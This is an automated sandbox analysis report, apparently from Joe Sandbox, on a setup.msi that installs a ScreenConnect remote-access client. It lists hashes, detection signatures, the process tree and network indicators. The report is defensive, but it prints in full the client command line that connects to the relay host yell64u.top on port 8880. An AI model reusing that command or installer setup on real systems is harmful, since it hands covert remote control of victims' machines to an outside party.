Windows Analysis Report
setup.msi

Overview

General Information

Sample name: setup.msi
Analysis ID: 1555428
MD5: ed78bad542629e617ae49dfeffabcfcc
SHA1: bf5efe919b3c3561c433d9d4cd0f323a9359017e
SHA256: 86231cca7231e3905a7317d07350c19f3923e24f34732c0aa6c022599913b1a3

Detection

ScreenConnect Tool
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • msiexec.exe (PID: 7028 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7128 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6292 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 4820 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 1420 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941D MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2188 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 1344 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4888 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 3868 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author
C:\Config.Msi\5c1176.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Installer\MSI15E9.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Source | Rule | Description | Author
00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
Process Memory Space: rundll32.exe PID: 4820 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4888 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Source | Rule | Description | Author
7.2.ScreenConnect.WindowsClient.exe.254fa20.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
7.0.ScreenConnect.WindowsClient.exe.280000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
8.2.ScreenConnect.WindowsClient.exe.2e5fa60.4.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=", ProcessId: 1344, ProcessName: ScreenConnect.ClientService.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7128, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T21:32:24.311224+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49731 | TCP
2024-11-13T21:33:02.882749+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49737 | TCP

                        AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 94.3% probability
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 6_2_03E016F8 CryptProtectData,6_2_03E016F8
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 6_2_03E016F1 CryptProtectData,6_2_03E016F1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 6_2_051A2E10 CryptUnprotectData,6_2_051A2E10
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 6_2_051A2E08 CryptUnprotectData,6_2_051A2E08
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743291281.00000000014D2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743239856.0000000001490000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1693323566.000000000058D000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1671136153.0000000004B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: setup.msi, MSI15E9.tmp.1.dr, 5c1176.rbs.1.dr, MSI160A.tmp.1.dr, 5c1175.msi.1.dr, MSI17FF.tmp.1.dr, 5c1177.msi.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: setup.msi, 5c1175.msi.1.dr, MSID3F.tmp.0.dr, 5c1177.msi.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745103235.000000001BA72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source: C:\Windows\System32\msiexec.exe; File opened: z:
Source: C:\Windows\System32\msiexec.exe; File opened: x:
Source: C:\Windows\System32\msiexec.exe; File opened: v:
Source: C:\Windows\System32\msiexec.exe; File opened: t:
Source: C:\Windows\System32\msiexec.exe; File opened: r:
Source: C:\Windows\System32\msiexec.exe; File opened: p:
Source: C:\Windows\System32\msiexec.exe; File opened: n:
Source: C:\Windows\System32\msiexec.exe; File opened: l:
Source: C:\Windows\System32\msiexec.exe; File opened: j:
Source: C:\Windows\System32\msiexec.exe; File opened: h:
Source: C:\Windows\System32\msiexec.exe; File opened: f:
Source: C:\Windows\System32\msiexec.exe; File opened: b:
Source: C:\Windows\System32\msiexec.exe; File opened: y:
Source: C:\Windows\System32\msiexec.exe; File opened: w:
Source: C:\Windows\System32\msiexec.exe; File opened: u:
Source: C:\Windows\System32\msiexec.exe; File opened: s:
Source: C:\Windows\System32\msiexec.exe; File opened: q:
Source: C:\Windows\System32\msiexec.exe; File opened: o:
Source: C:\Windows\System32\msiexec.exe; File opened: m:
Source: C:\Windows\System32\msiexec.exe; File opened: k:
Source: C:\Windows\System32\msiexec.exe; File opened: i:
Source: C:\Windows\System32\msiexec.exe; File opened: g:
Source: C:\Windows\System32\msiexec.exe; File opened: e:
Source: C:\Windows\System32\msiexec.exe; File opened: c:
Source: C:\Windows\System32\msiexec.exe; File opened: a:

                        Networking

Source: C:\Windows\System32\msiexec.exe; Registry value created: NULL Service
Source: global traffic; TCP traffic: 192.168.2.4:49730 -> 85.239.34.190:8880
Source: Joe Sandbox View; ASN Name: RAINBOW-HKRainbownetworklimitedHK
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49737
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49731
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: yell64u.top
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2909894070.00000000125EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2909894070.00000000125EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2905919832.0000000001952000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr; String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
